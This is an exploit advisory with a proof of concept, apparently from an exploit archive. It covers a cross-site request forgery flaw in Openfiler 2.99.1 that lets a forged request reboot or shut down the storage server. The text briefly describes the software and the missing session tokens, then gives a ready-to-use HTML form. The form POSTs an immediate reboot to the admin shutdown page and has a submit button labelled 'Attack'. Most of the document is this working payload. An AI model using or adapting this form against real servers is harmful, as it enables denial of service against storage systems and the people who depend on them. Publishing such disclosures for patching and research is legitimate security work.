<!--# Exploit Title: DoS via CSRF in openfiler# Exploit author: Dolev Farhi @dolevff# Date 07/05/2014# Vendor homepage: http://www.openfiler.com# Affected Software version: 2.99.1# Alerted vendor: 7.5.14# CVE: N/A
Software Description
=====================
Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
Storage Area Networking functionality in a single cohesive framework.
Vulnerability Description
=========================
it is possible to shutdown/reboot a server running openfiler and cause denial of service via CSRF due to missing session tokens.
Steps to reproduce / PoC:=========================--><html><div align="center"><pre><h2><b>DoS <b></h2><body><form
action="https://ip.add.re.ss:446/admin/system_shutdown.html"
method="POST"><inputtype="hidden" name="shutdowntype" value="reboot"/><inputtype="hidden" name="delay" value="0"/><inputtype="hidden" name="action" value="Shutdown"/><inputtype="submit" name="submit" value="Attack"/></form></body></div></html>
